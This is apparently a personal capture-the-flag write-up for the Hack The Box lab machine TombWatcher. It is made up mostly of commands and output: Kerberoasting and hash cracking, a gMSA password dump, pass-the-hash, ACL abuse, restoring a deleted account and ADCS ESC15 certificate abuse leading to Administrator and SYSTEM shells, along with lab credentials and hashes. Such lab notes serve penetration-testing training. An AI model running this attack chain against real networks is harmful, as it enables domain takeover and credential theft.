Here is my note on TOMBWATCHER box from Hackthebox.
TOMBWATCHER: 10.129.47.32
As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
PORT STATE SERVICE VERSION [33/66]
53/tcp open domain Simple DNS Plus
sudo bloodhound-python -u 'henry' -p 'H3nry_987TGV!' -ns 10.129.47.32 -d tombwatcher.htb -c all
HENRY -> WriteSPN -> ALFRED
targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
┌──(root㉿kali)-[/home/…/BOXES/TOMBWATCHER/10.129.47.32/BLOOD]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$4ef2975de18399380928794fffb40058$2aac1c4cb277721f98a70545b3baea5be1baa7050bf9294d91bafdb358ce8479f41ed24f462fabba7c508d9a2f7569ca83d9f74837f89e50a327d562844d2d1971590e5fe8c4f5368634d13181b66361fc1ea327899a5458281bec3dcca8f77ceff017b6443f9aaa6bfd920cac5981997daa6dccf075a39594e6aee1fb84f74c0c8fd68cce4b788bdad5745faf989259ca1d77892719d898cc2077d58e49b1362f4b9a312b41228c0e31773dd0a7f056f4e5adbd3f266702a9872886c688b4f12c1bec52470d188fd3ee2e0e477649cf36ccfeb1efb67a81feaabe83a3405b3bbc218fca85514ad13b52d996ed02ea644a13dc0594015987f63219d51682190c2fd771ab563b55b38d53af1060aa83082d211cf6dbef90c65e2c6c15d97001d607f5bda93824eae40bb8c79ea1c97f85b033344e7dc87fa6d1a51bc4757d58aec223dcf26ca9ce4faf3b651121ea14069d7f81aa1d543c6589fe48946bd787974a0116bc37c80f70438225d472c87189865d75e6683a483b3030cc933232b30f9325e7180fdf7ef6255fba95c8d1033419a1ec3a664376d244a2d01193ce1e39c978f199f70192a008dc18b9eaaee465ce8fa0ca6e1013479c795e7c0392f333f6f1573fea2e30c6fcc2770122085d3505d277c3d8728cc6db458bab690327dd8bc2e7a4c5fa786377526b0ea2b594f79e0ddcb281a3bb5e13ad14ef8e0163458f74d925326b4c2d75bf3eae78f2c8ec18c7c7740d15e05a5f5513350564368776b551bfda03f8e32710020e9a6d71efd77048c98a09ca513207fb6d4cb0a6ed9b8b5875140cd1a3e4aad275dabfa6977e9b191c9f45749c42e725c46f28c66a36fe4ff902908ceaddd1c665a8ea4132391734ff19760ff53c56970b5239f9d1e5968cc21aafd88d90816c7dbb4e3ae20d62518c246cd364217d4f5e07d887d3d93ad64429120e3723b7617e6052e914c1922240c180ccd3b7d6e28ce538ae7e8c4c0e556c55b7dbdd0717a8660c8262824faaa8f6abdf8a969063a8a9c29c679f628a3a17447bedf46a0e98484a4982966b136fa6e3c28ee0b284bd2b877c58319ed057b8c685657bdff317973a681232c880e4acffe44d3198048a62a16e2b34bc41c141d3166704d5c8682434d29aca98b711cefb894ccce6a7bb85e2f1be0f4203e5a740cbb9cafa66cfe0bd79361f424c70363437bb24df99b68d63aabdde95fd2115bdece3be336f8edbe401ee9de78ec793e5197ae85f4b07d43da2b06f79574a0a3dde6bdd5f6e7c625a3d6835dad6c22341143215ce4439a4fff1761ecfddfff5b9ab1413a4d7a85fd29c91945038768c6037c8b9359d3148623663eb91ecfc752f80a04df94a8a2b79d3f9ed9275641f69464fa2795295358887b975bfc09e45508dfccd1d01f37cf6a25559169b1f6c33db9e31ad396624981fdd183a33d692a8649a60e7c4d5cab0c78cd88fcd3426
[VERBOSE] SPN removed successfully for (Alfred)
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
basketball (?)
1g 0:00:00:00 DONE (2025-06-14 02:52) 10.00g/s 10240p/s 10240c/s 10240C/s 123456..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Alfred:basketball
Alfred -> AddSelf -> INFRASTRUCTURE Group
net rpc group addmem "INFRASTRUCTURE" "ALFRED" -U "tombwatcher.htb"/"ALFRED"%"basketball" -S tombwatcher.htb
python3 -m venv bloodyad-env
source bloodyad-env/bin/activate
https://github.com/CravateRouge/bloodyAD
git clone https://github.com/CravateRouge/bloodyAD
pip3 install .
bloodyAD --host "10.129.47.32" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "alfred"
WORKS !
net rpc group members "INFRASTRUCTURE" -U "tombwatcher.htb"/"ALFRED"%"basketball" -S "tombwatcher.htb"
┌──(bloodyad-env)─(root㉿kali)-[/home/kali/Kali-Tools]
└─# bloodyAD --host "10.129.47.32" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "alfred"
[+] alfred added to INFRASTRUCTURE
┌──(bloodyad-env)─(root㉿kali)-[/home/kali/Kali-Tools]
└─# net rpc group members "INFRASTRUCTURE" -U "tombwatcher.htb"/"ALFRED"%"basketball" -S "tombwatcher.htb"
TOMBWATCHER\Alfred
INFRASTRUCTURE Group -> ReadGMSAPassword -> ANSIBLE_DEV$ -> ForceChangePassword -> SAM -> WriteOwner -> JOHN -> CanPSRemote -> DC01:
python3 gMSADumper.py -u 'alfred' -p 'basketball' -d 'tombwatcher.htb'
┌──(impacket-env)─(root㉿kali)-[/home/kali/Kali-Tools/gMSADumper]
└─# python3 gMSADumper.py -u 'alfred' -p 'basketball' -d 'tombwatcher.htb'
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::4b21348ca4a9edff9689cdf75cbda439
ansible_dev$:aes256-cts-hmac-sha1-96:499620251908efbd6972fd63ba7e385eb4ea2f0ea5127f0ab4ae3fd7811e600a
ansible_dev$:aes128-cts-hmac-sha1-96:230ccd9df374b5fad6a322c5d7410226
ansible_dev$:4b21348ca4a9edff9689cdf75cbda439
pth-net rpc password "SAM" 'Password123!' -U "tombwatcher.htb"/"ansible_dev$"%"ffffffffffffffffffffffffffffffff":"4b21348ca4a9edff9689cdf75cbda439" -S "tombwatcher.htb"
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# pth-net rpc password "SAM" 'Password123!' -U "tombwatcher.htb"/"ansible_dev$"%"ffffffffffffffffffffffffffffffff":"4b21348ca4a9edff9689cdf75cbda439" -S "tombwatcher.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# nxc smb 10.129.47.32 -u 'sam' -p 'Password123!' --shares
SMB 10.129.47.32 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.47.32 445 DC01 [+] tombwatcher.htb\sam:Password123!
sam:Password123!
python3 owneredit.py -action read -target 'JOHN' 'tombwatcher.htb'/'sam':'Password123!'
python3 owneredit.py -action write -new-owner 'SAM' -target 'JOHN' 'tombwatcher.htb'/'sam':'Password123!'
python3 owneredit.py -action read -target 'JOHN' 'tombwatcher.htb'/'sam':'Password123!'
python3 dacledit.py -action 'write' -rights 'FullControl' -principal sam -target 'JOHN' 'tombwatcher.htb'/'sam':'Password123!'
net rpc password 'JOHN' Password -U tombwatcher.htb/sam%Password123! -S dc01.tombwatcher.htb
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# nxc smb 10.129.47.32 -u 'john' -p 'Password'
SMB 10.129.47.32 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.47.32 445 DC01 [+] tombwatcher.htb\john:Password
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# nxc winrm 10.129.47.32 -u 'john' -p 'Password'
WINRM 10.129.47.32 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:tombwatcher.htb)
WINRM 10.129.47.32 5985 DC01 [+] tombwatcher.htb\john:Password (Pwn3d!)
evil-winrm -i 10.129.47.32 -u john -p Password
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> whoami
tombwatcher\john
*Evil-WinRM* PS C:\Users\john\Documents> hostname
DC01
USER-SHELL !
JOHN -> GenericAll -> ADCS@TOMBWATCHER.HTB
certipy find -u john@tombwatcher.htb -p 'Password' -vulnerable -stdout -dc-ip 10.129.47.32
certipy find -stdout -u john@tombwatcher.htb -p 'Password' -dc-ip 10.129.47.32
certipy ca -u john -p 'Password' -target tombwatcher.htb -dc-ip 10.129.47.32 add-template -template-name MyESC1Template
certipy template add -u john -p 'Password' -target tombwatcher.htb -dc-ip 10.129.47.32 \
-name MyESC1Template -ca tombwatcher.htb\\ADCS -scheme ESC1
Certipy = Rabbit Hole ?
#PRIV ESC Section:
JOHN -> GenericAll -> CERT_ADMIN@TOMBWATCHER.HTB
net rpc password "cert_admin" "Password" -U "tombwatcher.htb"/"john"%"Password" -S "10.129.123.182"
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
Nothing interesting about dirsearch.
Nothing Interesting about nikto.
Time to do VHOST:
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://tombwatcher.htb/ -H "Host: FUZZ.tombwatcher.htb"
No Interesting VHOST and Nikto about that VHOST too.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-14 05:09:01Z)
┌──(root㉿kali)-[/home/…/BOXES/TOMBWATCHER/10.129.47.32/SYSVOL]
└─# GetUserSPNs.py -request -dc-ip 10.129.47.32 tombwatcher.htb/henry:H3nry_987TGV!
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
No entries found!
┌──(root㉿kali)-[/home/…/BOXES/TOMBWATCHER/10.129.47.32/SYSVOL]
└─# GetNPUsers.py -dc-ip 10.129.47.32 tombwatcher.htb/ -usersfile users.txt -format hashcat
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
/usr/local/bin/GetNPUsers.py:150: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Henry doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Alfred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sam doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User john doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ansible_dev$ doesn't have UF_DONT_REQUIRE_PREAUTH set
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-14T05:10:21+00:00; +3h10m33s from scanner time.
ldapsearch -H ldap://10.129.47.32 -x -W -D "henry@tombwatcher.htb" -b "dc=tombwatcher,dc=htb" '(objectClass=person)' > ldap-people
No interesting description and password fields.
john is Remote management user.
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# crackmapexec smb 10.129.47.32 -u 'henry' -p 'H3nry_987TGV!' --shares
/usr/lib/python3/dist-packages/paramiko/pkey.py:100: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"cipher": algorithms.TripleDES,
/usr/lib/python3/dist-packages/paramiko/transport.py:259: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"class": algorithms.TripleDES,
SMB 10.129.47.32 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.47.32 445 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
SMB 10.129.47.32 445 DC01 [+] Enumerated shares
SMB 10.129.47.32 445 DC01 Share Permissions Remark
SMB 10.129.47.32 445 DC01 ----- ----------- ------
SMB 10.129.47.32 445 DC01 ADMIN$ Remote Admin
SMB 10.129.47.32 445 DC01 C$ Default share
SMB 10.129.47.32 445 DC01 IPC$ READ Remote IPC
SMB 10.129.47.32 445 DC01 NETLOGON READ Logon server share
SMB 10.129.47.32 445 DC01 SYSVOL READ Logon server share #Nothing Interesting about it = NOPE !
sudo lookupsid.py henry@10.129.47.32 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-14T05:10:22+00:00; +3h10m33s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-14T05:10:21+00:00; +3h10m33s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-14T05:10:22+00:00; +3h10m33s from scanner time.
5985/tcp open wsman
evil-winrm -i 10.129.47.32 -u john -p Password
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> whoami
tombwatcher\john
*Evil-WinRM* PS C:\Users\john\Documents> hostname
DC01
USER-SHELL !
*Evil-WinRM* PS C:\Users\john\Desktop> whoami
tombwatcher\john
*Evil-WinRM* PS C:\Users\john\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\john\Desktop> dir
Directory: C:\Users\john\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/14/2025 1:05 AM 34 user.txt
*Evil-WinRM* PS C:\Users\john\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" –IncludeDeletedObjects
*Evil-WinRM* PS C:\Users\john\Documents> Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
ObjectClass : user
ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
Get-ADObject -Filter {displayName -eq "cert_admin"} -IncludeDeletedObjects | Restore-ADObject
Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
Enable-ADAccount -Identity cert_admin
*Evil-WinRM* PS C:\Users\john\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Alfred Guest
Henry john krbtgt
sam
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\john\Documents> Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
*Evil-WinRM* PS C:\Users\john\Documents>
*Evil-WinRM* PS C:\Users\john\Documents> Enable-ADAccount -Identity cert_admin
*Evil-WinRM* PS C:\Users\john\Documents>
*Evil-WinRM* PS C:\Users\john\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Alfred cert_admin
Guest Henry john
krbtgt sam
The command completed with one or more errors.
https://a45hw1n.github.io/posts/tombwatcher-htb/
Restore Active Directory Deleted Objects Using Recycle Bin
JOHN -> GenericAll -> CERT_ADMIN@TOMBWATCHER.HTB
net rpc password "cert_admin" "Password" -U "tombwatcher.htb"/"john"%"Password" -S "10.129.123.182"
certipy find -vulnerable -stdout -u cert_admin@tombwatcher.htb -p Password -dc-ip 10.129.123.182
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
ESC15 Notes:
certipy find -vulnerable -stdout -u cert_admin@tombwatcher.htb -p Password -dc-ip 10.129.123.182
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15
[*] Enumeration output:
Certificate Authorities
0
CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Password' \
-dc-ip '10.129.123.182' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-application-policies 'Certificate Request Agent'
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Password' \
-dc-ip '10.129.123.182' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-application-policies 'Certificate Request Agent'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'cert_admin.pfx'
[*] Wrote certificate and private key to 'cert_admin.pfx'
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Password' \
-dc-ip '10.129.123.182' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'User' \
-pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Password' \
-dc-ip '10.129.123.182' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'User' \
-pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182'
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@tombwatcher.htb'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# faketime -f $(ntpdate -q tombwatcher.htb | awk '{print $4}') bash
/usr/lib/python3/dist-packages/ntp/util.py:641: SyntaxWarning: invalid escape sequence '\]'
m = re.match("([:.[\]]|\w)*", inhost)
/usr/lib/python3/dist-packages/ntp/util.py:1398: SyntaxWarning: invalid escape sequence '\%'
if not c.isalnum() and c not in "/.:[] \%\n":
┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@tombwatcher.htb'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc
Alternative:
S-1-5-21-1392491010-1358638721-2126982587-1000
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Password' \
-dc-ip '10.129.123.182' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-upn 'administrator@tombwatcher.htb' -sid 'S-1-5-21-1392491010-1358638721-2126982587-500' \
-application-policies 'Client Authentication'
certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182' -ldap-shell
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182' -ldap-shell
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.123.182:636'
[*] Authenticated to '10.129.123.182' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
# whoami
u:TOMBWATCHER\Administrator
#LDAP-SHELL WORKS !
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc Administrator@tombwatcher.htb
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# sudo rlwrap psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc Administrator@tombwatcher.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on tombwatcher.htb.....
[*] Found writable share ADMIN$
[*] Uploading file wQZUorJS.exe
[*] Opening SVCManager on tombwatcher.htb.....
[*] Creating service tEer on tombwatcher.htb.....
[*] Starting service tEer.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EFB6-9D96
Directory of C:\Users\Administrator\Desktop
06/04/2025 06:38 PM <DIR> .
06/04/2025 06:38 PM <DIR> ..
08/21/2025 06:15 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,572,669,440 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
9389/tcp open adws
49666/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
49681/tcp open unknown
49701/tcp open unknown
49713/tcp open unknown
49748/tcp open unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
123/udp open ntp NTP v3
389/udp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3h10m32s, deviation: 0s, median: 3h10m32s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-06-14T05:09:41
|_ start_date: N/A